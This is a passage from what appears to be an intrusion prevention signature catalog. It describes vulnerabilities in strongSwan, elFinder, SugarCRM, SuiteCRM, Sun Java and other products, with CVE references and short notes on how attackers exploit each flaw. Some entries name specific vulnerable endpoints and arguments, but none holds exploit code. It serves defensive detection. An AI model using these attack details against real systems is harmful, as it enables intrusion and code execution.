Description: There exists a denial-of-service vulnerability in strongSwan. Incorrect parsing of RSASSA-PSS signatures in certificates could lead to denial-of-service conditions on the target server.
Situation: Generic_UDP-StrongSwan-Rsassa-Pss-Signature-Denial-Of-Service
References:
CVE-2018-6459
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6459
Back to top

StrongSwan-X509-Plugin-Denial-Of-Service

About this vulnerability: A vulnerability in strongSwan strongSwan
Risk: Moderate
First detected in: sgpkg-ips-958-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: strongSwan
Type: Input Validation
Description: A denial-of-service vulnerability has been reported in strongSwan. The vulnerability is due to improper parsing of various X509 certificate extensions. A remote attacker can send a crafted public key certificate to the target server and cause a denial-of-service condition in the target server.
Situation: Generic_UDP-StrongSwan-X509-Plugin-Denial-Of-Service
References:
CVE-2017-9023
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9023
Back to top

Studio-42-elFinder-Elfindervolumedriver-Command-Injection

About this vulnerability: A vulnerability in Studio-42 elFinder
Risk: High
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Platform: Generic
Software: elFinder
Type: Input Validation
Description: A command injection vulnerability has been reported in elFinder. The vulnerability is due to insufficient validation of the file name when creating an archive. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation results in the execution of arbitrary commands with the privileges of the web server process.
Situation: HTTP_CRL-Studio-42-elFinder-Elfindervolumedriver-Command-Injection
References:
CVE-2021-32682
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32682
Back to top

Studio-42-elFinder-Elfindervolumedriver-Unrestricted-File-Upload

About this vulnerability: A vulnerability in Studio-42 elFinder
Risk: High
First detected in: sgpkg-ips-1459-5242
Last changed: sgpkg-ips-1459-5242
Platform: Generic
Software: elFinder
Type: Input Validation
Description: A remote code execution vulnerability has been reported in Studio-42 elFinder. This vulnerability is due to improper input validation on file names when uploading files through the connector.minimal.php endpoint when the software is running on Windows. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary file write of an unpermitted type and, in the worst case, remote code execution.
Situation: HTTP_CS-Studio-42-elFinder-Elfindervolumedriver-Unrestricted-File-Upload
References:
CVE-2022-27115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27115
Back to top

Studio-42-elFinder-Getfullpath-Directory-Traversal

About this vulnerability: A vulnerability in Studio-42 elFinder
Risk: High
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Platform: Generic
Software: elFinder
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in elFinder. The vulnerability is due to insufficient validation of user submitted paths. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation can result in disclosure of the content of files outside of the expected document root, or in the worst case, execution of arbitrary code under the security context of the web server process.
Situation: HTTP_CRL-Studio-42-elFinder-Getfullpath-Directory-Traversal
References:
CVE-2022-26960
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26960
Back to top

Studio-Manager-Denial-of-Service

About this vulnerability: StudioManager.exe denial of service 0day
Risk: High
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Studio Manager
Type: Malfunction
Description: A vulnerability in StudioManager.exe that allows an attacker to crash the service by sending a specially crafted tcp packet.
Situation: Generic_CS-Studio-Manager-Denial-of-Service
Back to top

Subgraph-Vega-Vulnerability-Scanner-Usage

About this vulnerability: Parameters associated with Vega Vulnerability scanner
Risk: Moderate
First detected in: sgpkg-ips-562-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Subgraph Vega
Type: Vulnerability Scanner
Description: Subgraph Vega is an open source web application vulnerability scanner.
Situation: HTTP_CSU-Subgraph-Vega-Vulnerability-Scanner-Usage
Back to top

SugarCRM-EmailTemplates-Validation-Vulnerability-CVE-2023-22952

About this vulnerability: An attempt to exploit a vulnerability in SugarCRM detected
Risk: High
First detected in: sgpkg-ips-1584-5242
Last changed: sgpkg-ips-1584-5242
Platform: Generic
Software: SugarCRM
Type: Input Validation
Description: This vulnerability occurs due to a lack of appropriate validation when uploading a malicious PNG file with embedded PHP code to the web server using the vulnerable endpoint /index.php?module=EmailTemplates&action=AttachFiles. Once uploaded, depending on server configuration, the attacker can access the malicious PNG file and execute the malicious PHP code and gaining access to the system. Together with a missing authentication check in the loadUser() method in include/MVC/SugarApplication.php, this vulnerability enables any remote attacker, regardless of authentication, to gain access to the underlying operating system as the user that the web services are running as (typically www-data).
Situation: File-PNG_SugarCRM-EmailTemplates-Validation-Vulnerability-CVE-2023-22952
References:
CVE-2023-22952
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22952
Back to top

SugarCRM-Multiple-Parameters-Directory-Traversal

About this vulnerability: Multiple directory traversal vulnerabilities in SugarCRM
Risk: Moderate
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SugarCRM Sugar Sales
Type: Directory Traversal
Description: SugarCRM Sugar Sales Customer Relationship Management application for Microsoft Windows and Unix-based operating systems has a directory traversal vulnerability which allows remote attackers to read arbitrary files and possibly execute arbitrary PHP code via .. (dot dot) sequences in the (1) module, (2) action, or (3) theme parameters to index.php, (4) the theme parameter to Login.php, and possibly other parameters or scripts.
Situation: HTTP_CSU-SugarCRM-Multiple-Parameters-Directory-Traversal
References:
CVE-2004-1227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1227
BID-11740
http://www.securityfocus.com/bid/11740
OSVDB-12230
http://www.osvdb.org/12230
Back to top

SugarCRM-PHP-Unserialize-Vulnerability

About this vulnerability: A PHP unserialize() vulnerability in SugarCRM.
Risk: High
First detected in: sgpkg-ips-660-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SugarCRM
Type: PHP Injection
Description: A vulnerability in PHP unserialize() in SugarCRM, 6.3.1 and before, which allows authenticated users to write arbitrary PHP code, and execute code, through the _destruct() method from the SugarTheme class.
Situation: HTTP_CS-SugarCRM-PHP-Unserialize-Vulnerability
References:
CVE-2012-0694
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0694
OSVDB-83361
http://www.osvdb.org/83361
Back to top

SugarCRM-Record-Parameter-SQL-Injection

About this vulnerability: SQL injection vulnerability in SugarCRM
Risk: Moderate
First detected in: sgpkg-ips-19-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SugarCRM Sugar Sales
Type: SQL Injection
Description: SugarCRM Customer Relationship Management application for Microsoft Windows and Unix-based operating systems is vulnerable to SQL injection. By sending a specially-crafted URL request containing SQL code in the record variable, a remote attacker could obtain sensitive information, and add, modify or delete data in the backend database.
Situation: HTTP_CSU-SugarCRM-Record-Parameter-SQL-Injection
References:
CVE-2004-1225
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1225
BID-11740
http://www.securityfocus.com/bid/11740
OSVDB-12229
http://www.osvdb.org/12229
Back to top

SugarCRM-Rest_Data-PHP-Object-Deserialization

About this vulnerability: A vulnerability in SugarCRM
Risk: High
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SugarCRM
Type: Input Validation
Description: There exists a script injection vulnerability in SugarCRM. A remote attacker can use this to execute PHP code on the affected system.
Situation: HTTP_CRL-SugarCRM-Rest_Data-PHP-Object-Deserialization
Back to top

SuiteCRM-Authenticated-SQL-Injection-In-Export-Functionality

About this vulnerability: A vulnerability in SuiteCRM.
Risk: High
First detected in: sgpkg-ips-1507-5242
Last changed: sgpkg-ips-1507-5242
Platform: Generic
Software: SuiteCRM
Type: SQL Injection
Description: A vulnerability in SuiteCRM, versions before 7.12.6, which allows remote attackers to to retrieve all the usernames and their associated password from the database, by sending specially crafted requests to the export entry point of the application.
Situation: HTTP_CS-SuiteCRM-Authenticated-SQL-Injection-In-Export-Functionality
Back to top

SuiteCRM-Log-File-Remote-Code-Execution

About this vulnerability: A vulnerability in SuiteCRM.
Risk: High
First detected in: sgpkg-ips-1365-5242
Last changed: sgpkg-ips-1365-5242
Platform: Linux; Unix
Software: SuiteCRM
Type: Input Validation
Description: A vulnerability in SuiteCRM which allows remote attackers to populate the log file with PHP code and force the log file to be treated as a PHP file resulting in code execution, due to the insufficient validation of the logger_file_ext parameter.
Situation: HTTP_CS-CSuiteCRM-Log-File-Remote-Code-Execution
References:
CVE-2020-28328
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28328
Back to top

Sumavision-EMR-Arbitrary-User-Creation-CVE-2020-10181

About this vulnerability: A vulnerability in Sumavision EMR
Risk: High
First detected in: sgpkg-ips-1403-5242
Last changed: sgpkg-ips-1403-5242
Platform: Generic
Software: Sumavision
Type: Input Validation
Description: A vulnerability in Sumavision Enhanced Multimedia Router may allow unauthenticated attackers to create arbitrary users with admin privileges.
Situation: HTTP_CRL-Sumavision-EMR-Arbitrary-User-Creation-CVE-2020-10181
References:
CVE-2020-10181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10181
Back to top

Sun-Iplanet-Admin-Server-Open-Call-Vulnerability

About this vulnerability: Arbitrary command execution vulnerability in Sun iPlanet
Risk: Moderate
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: iPlanet
Type: Malfunction
Description: The Perl script importInfo in the Admin Server for iPlanet WebServer allows the web administrator to execute arbitrary commands via shell metacharacters in the dir paramater, and possibly allows remote attackers to exploit this vulnerability via a separate XSS issue (CVE-2002-1315).
References:
CVE-2002-1316
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1316
BID-6203
http://www.securityfocus.com/bid/6203
Back to top

Sun-Iplanet-Admin-Server-XSS

About this vulnerability: Cross-site scripting vulnerability in Sun iPlanet Admin Server
Risk: Moderate
First detected in: sgpkg-ips-176-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: iPlanet
Type: Cross-site Scripting
Description: Cross-site scripting (XSS) vulnerability in the Admin Server for iPlanet WebServer allows remote attackers to execute web script or HTML as the iPlanet administrator by injecting the desired script into error logs, and possibly escalating privileges by using the XSS vulnerability in conjunction with another issue (CVE-2002-1316).
Situation: HTTP_CRL-Iplanet-Web-Admin-Server-Command-Execution
References:
CVE-2002-1315
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1315
BID-6202
http://www.securityfocus.com/bid/6202
OSVDB-9220
http://www.osvdb.org/9220
Back to top

Sun-Java-Calendar-Deserialization-Privilege-Escalation

About this vulnerability: A security vulnerability in Sun JVM.
Risk: High
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Linux; Mac OS X
Software: Sun Java Runtime Environment; Sun Java Development Kit
Type: Insecure Configuration
Description: A security vulnerability in Sun Java Runtime Environment and Sun Java Development Kit, versions 5.0 Update 16 and earlier and SDK and JRE 1.4.2_18 and earlier, where the context of ZoneInfo objects during deserialization are not properly enforced, which may allow remote attackers to violate the same-origin policy, obtain sensitive information, bypass security restrictions, run untrusted applets with elevated privileges, and cause denial-of-service conditions.
Situation: File-Text_Sun-Java-Calendar-Deserialization-Privilege-Escalation
References:
CVE-2008-5353
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5353
BID-32608
http://www.securityfocus.com/bid/32608
OSVDB-50500
http://www.osvdb.org/50500
Back to top

Sun-Java-JRE-getSoundbank-Buffer-Overflow

About this vulnerability: A Sun Java JRE getSoundbank Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Mac OS X
Software: Sun Java Runtime Environment
Type: Buffer Overflow
Description: A vulnerability in Sun Java Runtime Environment, versions JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier, which allows remote attackers to bypass restrictions, elevate privileges, execute arbitrary code and cause denial of service conditions.
Situation: File-Text_Sun-Java-JRE-getSoundbank-Buffer-Overflow
References:
CVE-2009-3867
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3867
BID-36881
http://www.securityfocus.com/bid/36881
OSVDB-59711
http://www.osvdb.org/59711
Back to top

Sun-Java-JRE_DNS-Denial-Of-Service

About this vulnerability: A vulnerability in Sun Microsystems Java Runtime Environment
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sun Java Runtime Environment; BEA WebLogic
Type: Malfunction
Description: A vulnerability exists in the DNS functionality of the Sun Java Runtime Environment and the Sun Java Development Kit. When a vulnerable application that uses the affected Java class is manipulated into performing many DNS requests, an integer overflow can result. This would lead to a denial of service condition in the DNS client functionality. The behavior of an application using the JRE product depends on how it handles the exception generated by the vulnerable class. Here are some typical scenarios: 1. The application handles the exception as a critical failure. This will likely cause the application to terminate. 2. The application ignores the exception. It continues using the same instance(s) of the vulnerable class. In this case, DNS look-up is non-functional, which may be considered a denial of service condition. This will probably have a negative impact on the application for some period of time. Note that DNS lookup will successfully resume after the next 32768 unsuccessful tries. 3. The application handles the exception. Its exception handling functionality includes creating new instances of the vulnerable class. The application is unaffected by this vulnerability in such a case.
Situation: DNS-UDP_Sun-Java-JRE-DNS-Denial-Of-Service
References:
CVE-2004-1503
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1503
BID-11619
http://www.securityfocus.com/bid/11619
Back to top

Sun-Java-Plugin-JavaScript-Security-Restriction-Bypass

About this vulnerability: A vulnerability in Sun Java Runtime Environment
Risk: High
First detected in: sgpkg-ips-108-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sun Java Runtime Environment
Type: Malfunction
Description: There is a vulnerability in the Sun Java Runtime Environment that allows JavaScript code that assists the applet to bypass the restrictions set by the runtime environment. This may lead to code execution within the context of the current user.
Situation: HTTP_Sun-Java-Plugin-JavaScript-Security-Restriction-Bypass
File-Text_Sun-Java-Plugin-JavaScript-Security-Restriction-Bypass
References:
CVE-2004-1029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1029
BID-11726
http://www.securityfocus.com/bid/11726
Back to top

Sun-Java-Runtime-Awt-Setdifflcm-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Sun Microsystems Java Development Kit (JDK)
Risk: High
First detected in: sgpkg-ips-429-4219
Last changed: sgpkg-ips-1296-5242
Platform: -
Software: Sun Java Development Kit; Sun Java Runtime Environment
Type: Input Validation
Description: There is a buffer overflow vulnerability in Sun's Java Runtime Environment (JRE). Specifically, the vulnerability is due to a flaw that exists in the processing of arguments to the setDiffICM AWT library function. Due to the lack of bounds checking on one of the parameters to the function, a stack buffer overflow can occur. This error may be exploited by remote unauthenticated attackers to execute arbitrary code on the target system in the context of the current user.
Situation: File-Zip_Metasploit-Shellcode-JAR
References:
CVE-2009-3869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3869
BID-36881
http://www.securityfocus.com/bid/36881
Back to top

Sun-Java-Runtime-Environment-Pack200-Decompression-Integer-Overflow

About this vulnerability: A vulnerability in Sun Microsystems Java Runtime Environment (JRE)
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sun Java Runtime Environment; Sun Java Development Kit
Type: Integer Overflow
Description: There is an integer overflow vulnerability in Sun Java Runtime Environment software. The vulnerability is due to insufficient validation while decompressing Pack200 (jar.pack.gz) files. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted HTML file. Successful exploitation may lead to arbitrary code execution on the target. In an attack case where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the logged in user. In an attack case where code injection is not successful, the affected process will terminate abnormally.
Situation: File-Binary_Sun-Java-Runtime-Environment-Pack200-Decompression-Integer-Overflow
References:
CVE-2008-5352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5352
BID-32608
http://www.securityfocus.com/bid/32608
OSVDB-50501
http://www.osvdb.org/50501
Back to top

Sun-Java-System-Web-Server-Admin-Server-Denial-Of-Service

About this vulnerability: A vulnerability in Sun Microsystems Java System Web Server
Risk: Moderate
First detected in: sgpkg-ips-286-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sun Java Web Server
Type: Input Validation
Description: A denial of service vulnerability exists in Sun Java Web Server Admin Server. The vulnerability is due to insufficient input validation when processing malformed HTTP requests. A remote unauthenticated attacker can leverage this vulnerability by sending a crafted HTTP request to a target Admin Server. In a successful attack scenario the target Admin Server will terminate abnormally, creating a temporary denial of service condition.
Situation: Generic_CS-Sun-Java-System-Web-Server-Admin-Server-Denial-Of-Service
Back to top

Sun-Java-System-Web-Server-Digest-Authorization-Buffer-Overflow

About this vulnerability: A vulnerability in Sun Microsystems Java System Web Proxy Server
Risk: High
First detected in: sgpkg-ips-286-4219
Last changed: sgpkg-ips-1733-5242
Platform: Generic
Software: Sun Java Web Proxy Server; Sun Java Web Server
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Sun Java System Web Server. The vulnerability is due to insufficient boundary checks when processing malformed HTTP requests. A remote unauthenticated attack can leverage this vulnerability by sending a crafted HTTP request to a target server. In an attack scenario where code execution is successful the injected code will be executed within the security context of the target service, which is usually SYSTEM.
Situation: HTTP_CSH-Sun-Java-System-Web-Server-Digest-Authorization-Buffer-Overflow-2
Back to top

Sun-Java-Web-Console-Login-Format-String-Vulnerability

About this vulnerability: Format string vulnerability in Sun Java Web Console libwebconsole_services.so
Risk: Moderate
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-1296-5242
Platform: Solaris
Software: Sun Java Web Console
Type: Format String
Description: Libwebconsole_services.so in Sun Java Web Console 2.2.2 - 2.2.5 suffers from a format string vulnerability in login handling. The vulnerability allows remote attackers to execute arbitrary code on a vulnerable system.
Situation: Generic_CS-Sun-Java-Web-Console-Login-Format-String-Vulnerability
References:
CVE-2007-1681
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1681
BID-23539
http://www.securityfocus.com/bid/23539
OSVDB-34902
http://www.osvdb.org/34902
Back to top

Sun-Java-Web-Server-WebDAV-Stack-Overflow-Vulnerability

About this vulnerability: A vulnerability in Sun Java Web Server webdav argument handling
Risk: High
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Sun Java Web Server
Type: Malfunction
Description: A stack buffer overflow vulnerability exists in Sun Java System Web Server. The vulnerability is due to a boundary error when processing crafted WEBDAV requests. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code to be injected and executed in the security context of the affected process. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the logic of the malicious code. An unsuccessful exploit attempt may abnormally terminate the affected service.
Situation: HTTP_CRL-Excessively-Long-Proppatch-Request-Argument
HTTP_CRL-Excessively-Long-Propfind-Request-Argument
HTTP_CRL-Excessively-Long-Copy-Request-Argument
HTTP_CRL-Excessively-Long-Options-Request-Argument
References:
CVE-2010-0361
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0361
Back to top

Sun-Java-Web-Start-Double-Quote-Injection

About this vulnerability: A Sun Java Web Start Double Quote Injection vulnerability
Risk: High
First detected in: sgpkg-ips-783-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sun Java Web Start
Type: Malfunction
Description: A vulnerability in the Web Start component of Java Runtime Environment, versions SE 7 Update 7 and earlier, and 6 Update 35 and earlier, which allows remote attackers to execute arbitrary code.
Situation: File-TextId_Oracle-Java-Web-Start-Argument-Injection-Remote-Code-Execution
References:
CVE-2012-1533
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1533
BID-56046
http://www.securityfocus.com/bid/56046
OSVDB-86348
http://www.osvdb.org/86348
Back to top

Sun-Java-Web-Start-Jnlp-Java-vm-args-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Sun Microsystems Java Web Start
Risk: High
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sun Java Web Start; Sun Java Development Kit; Sun Java Runtime Environment; Sun Java 2 Software Development Kit
Type: Buffer Overflow
Description: There exists a heap buffer overflow vulnerability in Sun Java Web Start. The vulnerability is due to improper bound checking while handling XML based JNLP files. A remote unauthenticated attacker can exploit this vulnerability by enticing the target user to open a crafted JNLP file, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_SS-Sun-Java-Web-Start-Jnlp-Java-vm-args-Heap-Buffer-Overflow
File-TextId_Sun-Java-Web-Start-Jnlp-Java-vm-args-Heap-Buffer-Overflow
References:
CVE-2008-3111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3111
BID-30148
http://www.securityfocus.com/bid/30148
Back to top

Sun-Java-Web-Start-Jnlp-vm-args-Stack-Overflow

About this vulnerability: A stack buffer overflow vulnerability in Sun Java Web Start
Risk: High
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Sun Java Web Start
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in Sun Java Web Start. A remote unauthenticated attacker can exploit this vulnerability by enticing a user to open a crafted JNLP file, terminating the affected application or causing arbitrary code to be executed with the privileges of the currently logged in user.
Situation: HTTP_SS-Sun-Java-Web-Start-Jnlp-vm-args-Stack-Overflow
File-TextId_Sun-Java-Web-Start-Jnlp-vm-args-Stack-Overflow
References:
CVE-2008-3111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3111
BID-30148
http://www.securityfocus.com/bid/30148
OSVDB-46959
http://www.osvdb.org/46959
Back to top

Sun-Java-Web-Start-Launch-Command-Line-Injection

About this vulnerability: A command-line injection vulnerability in Sun Java Web Start
Risk: High
First detected in: sgpkg-ips-301-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Sun Java Runtime Environment
Type: Malfunction
Description: There is a command-line injection vulnerability in Sun Java Web Start. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted web page to break out of the Java security sandbox and execute arbitrary Java code on the vulnerable host.
Situation: HTTP_SS-Sun-Java-Web-Start-Launch-Command-Line-Injection
File-Text_Sun-Java-Web-Start-Launch-Command-Line-Injection
Back to top

Sun-Java-Web-Start-Plugin-Argument-Injection

About this vulnerability: A Sun Java Web Start Plugin Argument Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sun Java Web Start
Type: Input Validation
Description: A vulnerability in Sun Java Web Start Plugin, in multiple update versions in Java 6, allows remote attackers to execute arbitrary code when passing -J or -XXaltjvm arguments to javaws.exe, which is processed by the launch method.
Situation: File-Text_Sun-Java-Web-Start-Plugin-Argument-Injection
References:
CVE-2010-0886
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0886
BID-39346
http://www.securityfocus.com/bid/39346
OSVDB-63648
http://www.osvdb.org/63648
Back to top

Sun-Java-Web-Start-Splashscreen-Gif-Decoding-Buffer-Overflow

About this vulnerability: A vulnerability in Sun Microsystems JDK
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Java Development Kit; Sun Java Runtime Environment
Type: Buffer Overflow
Description: There exists a memory corruption vulnerability in Sun Microsystems' Java Web Start. The flaw is due to a boundary error when displaying a customized splashscreen GIF image. A remote attacker may exploit this vulnerability by enticing the target user to visit a malicious web page. Successful attack may allow for arbitrary code injection and execution with privileges of the target user. In an attack case where code injection is not successful, the Java Web Start application will terminate unexpectedly. In a more sophisticated attack scenario where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. In such a case, the injected code will be executed within the context of the currently logged in user.
Situation: File-GIF_Sun-Java-Web-Start-Splashscreen-Gif-Decoding-Buffer-Overflow
References:
CVE-2008-2086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2086
BID-32608
http://www.securityfocus.com/bid/32608
OSVDB-50510
http://www.osvdb.org/50510
Back to top

Sun-Java-Web-Start-Splashscreen-PNG-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in Sun Microsystems Java Development Kit (JDK)
Risk: Moderate
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1841-5242
Platform: Generic
Software: Sun Java Development Kit; Sun Java Runtime Environment
Type: Buffer Overflow
Description: A heap-based buffer overflow vulnerability exists in Sun Microsystems' Java Web Start (JWS). The flaw is due to a boundary error when displaying a customized splash screen PNG image. A remote attacker may exploit this vulnerability by enticing the target user to visit a malicious web page. Successful attack can allow for arbitrary code injection and execution with the privileges of the target user. In an attack case where code injection is not successful, the Java Web Start application will terminate unexpectedly. In a more sophisticated attack scenario where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. In such a case, the injected code will be executed within the context of the currently logged in user.
Situation: File-PNG_PNG-Image-With-Excessively-Large-Height-Or-Width-Value
References:
CVE-2009-1097
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1097
BID-34240
http://www.securityfocus.com/bid/34240
Back to top

Sun-Java-WebDAV-Propfind-Format-String-Vulnerability

About this vulnerability: Attempt to exploit format string vulnerability in Sun Java Webdav
Risk: High
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Sun Java Web Server
Type: Malfunction
Description: There is a format string vulnerability in the WebDAV implementation in webservd in Sun Java System Web Server 7.0 Update 6 that allows remote attackers to cause a denial of service and possibly execute arbitrary code via format string specifiers in the encoding attribute of the XML declaration in a PROPFIND request.
Situation: HTTP_CS-Sun-Java-Web-Server-WebDAV-Format-String-Vulnerability
References:
CVE-2010-0388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0388
BID-37910
http://www.securityfocus.com/bid/37910
Back to top

Sun-JDK-Image-Parsing-Library-ICC-Buffer-Overflow

About this vulnerability: A vulnerability in Sun JDK
Risk: High
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Sun Java Development Kit
Type: Buffer Overflow
Description: An integer overflow vulnerability exists in the way Sun JDK image parser handles JPG files. The vulnerability is due to improper checking of the ICC profile data when parsing JPG files. A remote attacker may leverage this vulnerability to inject and execute arbitrary code on the target host, in the context of the currently logged in user.
Situation: File-JPEG_Sun-JDK-Image-Parsing-Library-ICC-Buffer-Overflow
References:
CVE-2007-2788
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2788
BID-24004
http://www.securityfocus.com/bid/24004
Back to top

Sun-JRE-Pack200-Decompression-Integer-Overflow

About this vulnerability: A vulnerability in Sun Microsystems Java Development Kit (JDK)
Risk: Moderate
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sun Java Development Kit; Sun Java Runtime Environment
Type: Integer Overflow
Description: There exists a vulnerability in Sun Java Runtime Environment software. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Binary_Sun-JRE-Pack200-Decompression-Integer-Overflow
References:
CVE-2009-1095
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1095
BID-34240
http://www.securityfocus.com/bid/34240
Back to top

Sun-Microsystems-Java-Gif-File-Handling-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Sun Microsystems' JRE
Risk: High
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sun Java Runtime Environment
Type: Malfunction
Description: There is a memory corruption vulnerability in Sun Microsystems' Java Runtime Environment (JRE). The vulnerability is caused by improper checking of the image width when parsing GIF files. A remote attacker may leverage this vulnerability to inject and execute arbitrary code on the target host, in the context of the currently logged in user.
Situation: HTTP_Sun-Microsystems-Java-Gif-File-Handling-Memory-Corruption
File-Binary_Sun-Microsystems-Java-Gif-File-Handling-Memory-Corruption
File-GIF_Sun-Microsystems-Java-Gif-File-Handling-Memory-Corruption
References:
CVE-2007-0243
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0243
BID-22085
http://www.securityfocus.com/bid/22085
OSVDB-32834
http://www.osvdb.org/32834
Back to top

Sun-Microsystems-Java-System-Web-Proxy-Sockd-Daemon-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Sun Microsystems Java System Web Proxy Server
Risk: High
First detected in: sgpkg-ips-109-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sun Java Web Proxy Server
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Java System Web Proxy sockd daemon. The vulnerability is due to a lack of boundary checking on user-provided parameters when parsing the message received during protocol negotiation. A remote unauthenticated attacker may leverage this vulnerability by sending a specially crafted connection request. Successful exploitation allows injection and execution of arbitrary code with System/root privileges.
Situation: Generic_Sun-Microsystems-Java-System-Web-Proxy-Sockd-Daemon-Buffer-Overflow
References:
CVE-2007-2881
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2881
BID-24165
http://www.securityfocus.com/bid/24165
OSVDB-35841
http://www.osvdb.org/35841
Back to top

Sun-Microsystems-JRE-Isinstalled.dnsresolve-Function-Memory-Exception

About this vulnerability: A vulnerability in Sun Microsystems Java Web Start
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sun Java Web Start; Sun Java Development Kit; Sun Java Runtime Environment
Type: Malfunction
